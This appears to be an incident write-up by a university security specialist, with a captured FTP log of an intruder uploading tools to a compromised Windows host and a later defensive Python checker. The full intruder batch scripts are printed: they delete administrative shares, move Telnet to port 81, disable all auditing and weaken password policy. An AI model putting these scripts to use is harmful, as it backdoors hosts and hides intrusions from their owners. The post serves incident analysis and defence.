PWD

257 "/e:/RECYCLER/S-1-5-21-1960408961-1409082233-1417001333-1001" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,194)
>.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
>.....CDUP
250 Directory changed to /e:/RECYCLER
PWD

257 "/e:/RECYCLER" is current directory.
>.....CDUP
250 Directory changed to /e:
PWD

257 "/e:" is current directory.
>.....CWD /c:/
250 Directory changed to /c:
PWD

257 "/c:" is current directory.
>.....CWD WINDOWS
250 Directory changed to /c:/WINDOWS
PWD

257 "/c:/WINDOWS" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,195)
>.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
>.....CWD system32
250 Directory changed to /c:/WINDOWS/system32
PWD

257 "/c:/WINDOWS/system32" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,196)
>.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
8.....226 Transfer complete.
8.....CWD dllcache
250 Directory changed to /c:/WINDOWS/system32/dllcache
PWD

257 "/c:/WINDOWS/system32/dllcache" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,197)
8.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
8.....226 Transfer complete.
226 Transfer complete.
8.....TYPE I
200 Type set to I.
SIZE updmgr.exe
550 /c:/WINDOWS/system32/dllcache/updmgr.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,198)
STOR updmgr.exe
150 Opening BINARY mode data connection for updmgr.exe.
8.....226 Transfer complete.
TYPE A
200 Type set to A.
SIZE updmgr.ini
550 /c:/WINDOWS/system32/dllcache/updmgr.ini: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,199)
8.....STOR updmgr.ini
150 Opening ASCII mode data connection for updmgr.ini.
226 Transfer complete.
8.....8.....PASV
227 Entering Passive Mode (0,0,0,0,4,200)
8.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
8.....226 Transfer complete.
226 Transfer complete.
8.....SIZE updmgr.ini
213 1203
PASV
227 Entering Passive Mode (0,0,0,0,4,201)
8.....RETR updmgr.ini
150 Opening ASCII mode data connection for updmgr.ini (1203 bytes).
226 Transfer complete.
8.....CWD /c:/WINDOWS/temp
250 Directory changed to /c:/WINDOWS/Temp
PWD

257 "/c:/WINDOWS/Temp" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,202)
8.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
7.....SIZE run.bat
550 /c:/WINDOWS/Temp/run.bat: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,203)
7.....STOR run.bat
150 Opening ASCII mode data connection for run.bat.
226 Transfer complete.
7.....SIZE ipcsec.bat
550 /c:/WINDOWS/Temp/ipcsec.bat: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,204)
2.....STOR ipcsec.bat
150 Opening ASCII mode data connection for ipcsec.bat.
2.....226 Transfer complete.
2.....PASV
227 Entering Passive Mode (0,0,0,0,4,205)
2.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
1.....CDUP
250 Directory changed to /c:/WINDOWS
PWD

257 "/c:/WINDOWS" is current directory.
1.....CDUP
250 Directory changed to /c:
PWD

257 "/c:" is current directory.
1.....PASV
227 Entering Passive Mode (0,0,0,0,4,206)
1.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
1.....CDUP
250 Directory changed to /c:
PWD

257 "/c:" is current directory.
1.....CWD /c:/windows/system32
250 Directory changed to /c:/WINDOWS/system32
PWD

257 "/c:/WINDOWS/system32" is current directory.
1.....TYPE I
200 Type set to I.
SIZE fport.exe
550 /c:/WINDOWS/system32/fport.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,207)
1.....STOR fport.exe
150 Opening BINARY mode data connection for fport.exe.
1.....226 Transfer complete.
1.....SIZE kill.exe
550 /c:/WINDOWS/system32/kill.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,208)
1.....STOR kill.exe
150 Opening BINARY mode data connection for kill.exe.
1.....226 Transfer complete.
1.....TYPE A
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,209)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
1.....226 Transfer complete.
1.....CWD dllcache
250 Directory changed to /c:/WINDOWS/system32/dllcache
PWD

257 "/c:/WINDOWS/system32/dllcache" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,212)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
1.....226 Transfer complete.
226 Transfer complete.
1.....PASV
227 Entering Passive Mode (0,0,0,0,4,213)
+.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
+.....226 Transfer complete.
+.....CWD /c:/
250 Directory changed to /c:
PWD

257 "/c:" is current directory.
+.....CWD /e:/
250 Directory changed to /e:
PWD

257 "/e:" is current directory.
+.....CWD RECYCLER
250 Directory changed to /e:/RECYCLER
PWD

257 "/e:/RECYCLER" is current directory.
+.....CDUP
250 Directory changed to /e:
PWD

257 "/e:" is current directory.
+.....CWD System Volume Information
250 Directory changed to /e:/System Volume Information
PWD

257 "/e:/System Volume Information" is current directory.
+.....MKD restore
257 "/e:/System Volume Information/restore" directory created.
PWD

257 "/e:/System Volume Information" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,214)
*.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
*.....CWD /e:/
250 Directory changed to /e:
PWD

257 "/e:" is current directory.
*.....QUIT
221 Goodbye!


*|*|Attempted to run a security template - This is also seen in some
advanced worms out there.  They have the path wrong in the script so
it failed.  What they are trying to do here is 'secure' the
workstation so that other hackers can't break into it.  They also set
the port number for the Microsoft Telnet Service to 81 and restart it
to take effect.

Contents of C:\WINDOWS\IPCSEC.BAT
cd\
echo    [ IPC OFF by Kamui ]
echo.
echo    [Auto-delete IPC Share ]
echo.
echo @REGEDIT4>>root.reg
echo
@[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>r
oot.reg
echo @"NetworkStartup"="net share IPC$ /delete /yes">>root.reg
echo @"Secure"="net share ADMIN$ /delete /yes">>root.reg
echo @"Secure1"="net share C$ /delete /yes">>root.reg
echo @"Secure2"="net share D$ /delete /yes">>root.reg
@regedit /S root.reg
@del root.reg
echo.
echo @REGEDIT4 >> roots.reg
echo @[HKEY_LOCAL_MACHINE\Software\Microsoft\TelnetServer    \1.0\]
 >> roots.reg
echo @"NTLM"=dword:00000000 >> roots.reg
echo @"TelnetPort"=dword:00000051 >> roots.reg
echo @[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\T    lntSvr\]
 >> roots.reg
echo @"Start"=dword:00000002 >> roots.reg
@regedit /S roots.reg
@net stop telnet
@net start telnet
@del roots.reg
echo   [ lE pORt 81 et OUverT ] en telnet !!
echo.
echo   [ La Securistation est en Cour ]
echo.
echo @[Version] >> temp
echo @signature="$Kamui$" >> temp
echo @Revision=1 >> temp
echo @[ Description du Profil ] >> temp
echo @Description=Default Security Settings. (Windows 2000
Professional) >> temp
echo @[ Acc?System ] >> temp
echo @MinimumPasswordAge = 0 >> temp
echo @MaximumPasswordAge = 42 >> temp
echo @MinimumPasswordLength = 0 >> temp
echo @PasswordComplexity = 0 >> temp
echo @PasswordHistorySize = 0 >> temp
echo @LockoutBadCount = 0 >> temp
echo @RequireLogonToChangePassword = 0 >> temp
echo @ClearTextPassword = 0 >> temp
echo @[ Audit ] >> temp
echo @AuditSystemEvents = 0 >> temp
echo @AuditLogonEvents = 0 >> temp
echo @AuditObjectAccess = 0 >> temp
echo @AuditPrivilegeUse = 0 >> temp
echo @AuditPolicyChange = 0 >> temp
echo @AuditAccountManage = 0 >> temp
echo @AuditProcessTracking = 0 >> temp
echo @AuditDSAccess = 0 >> temp
echo @AuditAccountLogon = 0 >> temp
echo @[ Valeur De Registre ] >> temp
echo @ machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo @ machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo @ machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo @ machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo @ machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo @ machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo @ machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo @ machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo @ machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo @ machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo @ machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo @ machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo @ machine\system\currentcontrolset\control\sessionmanager\protectionmode=4,1 >> temp
echo @ machine\system\currentcontrolset\control\sessionmanager\memorymanagement\clearpagefileatshutdown=4,0 >> temp
echo @ machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo @ machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo @ machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo @ machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo @ machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo @ machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo @ machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo @ machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo @ machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo @ machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo @ machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo @ machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo @ machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo @ machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo @ machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo @ machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo @ machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo @ machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo @[ Droit et Privilege ] >> temp
echo @seassignprimarytokenprivilege = >> temp
echo @seauditprivilege = >> temp
echo @sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo @sebatchlogonright = >> temp
echo @sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >>temp
echo @secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo @secreatepermanentprivilege = >> temp
echo @secreatetokenprivilege = >> temp
echo @sedebugprivilege = *S-1-5-32-544 >> temp
echo @sedenybatchlogonright = >> temp
echo @sedenyinteractivelogonright = >> temp
echo @sedenynetworklogonright = >> temp
echo @sedenyservicelogonright = >> temp
echo @seenabledelegationprivilege = >> temp
echo @seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo @seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo @seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501>> temp
echo @seloaddriverprivilege = *S-1-5-32-544 >> temp
echo @selockmemoryprivilege = >> temp
echo @semachineaccountprivilege = >> temp
echo @senetworklogonright = %1 >> temp
echo @seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547>> temp
echo @seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo @serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo @sesecurityprivilege = *S-1-5-32-544 >> temp
echo @seservicelogonright = >> temp
echo @seshutdownprivilege =*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo @sesyncagentprivilege = >> temp
echo @sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo @sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo @sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo @setakeownershipprivilege = *S-1-5-32-544 >> temp
echo @setcbprivilege = >> temp
echo @seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545>> temp
echo @Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
echo  [ Le System est Maintenant Securiser ]
echo.
echo  [ FInitiOn - FermetURE tOtalE ]
echo         Deleting IPC share
echo.
@net share ADMIN$ /delete /yes
@net share C$ /delete /yes
@net share D$ /delete /yes
@net share IPC$ /delete /yes
cd\
a.bat


Contents of a.bat
net share /delete ADMIN$ /y
net share /delete IPC$ /y
net share /delete C$ /y
==============================================
David Taylor     	//      Sr. Information Security Specialist
Information Systems & Computing  // 	     Information Security
University of Pennsylvania	//   	   Philadelphia PA USA
(215) 898-1236
http://www.upenn.edu/computing/security/
==============================================

SANS - The Twenty Most Critical Internet Security Vulnerabilities
http://www.sans.org/top20/
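The file the script builds with all those echo lines is a secedit .inf security template, and a defender reviewing such a template wants to know which of its settings weaken the host (audit categories turned off, password policy relaxed, logon rights handed to Guest). The checker below is an added example, not code from the post; it assumes the standard English secedit section names, and its sample template is constructed, reusing only the machine SID prefix visible in the captured script:

```python
# Added example, not from the post: checks a secedit .inf template like the
# one IPCSEC.BAT builds for settings that weaken the host (standard English section names).

# Constructed sample; the machine SID prefix is the one visible in the captured
# script, with RID 501 (local Guest) appended as the script does.
SAMPLE_TEMPLATE = """\
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 0
AuditAccountLogon = 0
AuditPolicyChange = 3
[Privilege Rights]
seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501
sedebugprivilege = *S-1-5-32-544
"""
GUEST_RID = "-501"  # well-known RID of the local Guest account

def parse_template(text):
    """Parse an INI-style template into {section: {key: value}}; keys are lowercased."""
    sections, current = {}, {}
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip(), {})
        elif "=" in line and not line.startswith(";"):
            key, _, value = line.partition("=")
            current[key.strip().lower()] = value.strip()
    return sections

def find_weakenings(sections):
    """Return a sorted list of settings that lower the host's security."""
    findings = []
    for key, value in sections.get("Event Audit", {}).items():
        if key.startswith("audit") and value == "0":
            findings.append(f"audit disabled: {key}")
    access = sections.get("System Access", {})
    if access.get("passwordcomplexity") == "0":
        findings.append("password complexity off")
    if access.get("minimumpasswordlength", "").isdigit() and int(access["minimumpasswordlength"]) < 8:
        findings.append("minimum password length below 8")
    if access.get("lockoutbadcount") == "0":
        findings.append("account lockout off")
    for key, value in sections.get("Privilege Rights", {}).items():
        if key.endswith("logonright") and not key.startswith("sedeny"):
            sids = [s.strip().lstrip("*") for s in value.split(",")]
            if any(s.endswith(GUEST_RID) for s in sids):
                findings.append(f"Guest granted {key}")
    return sorted(findings)
```

Run against a template exported with secedit /export from a suspect host, the same checks flag the changes this script was trying to make.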

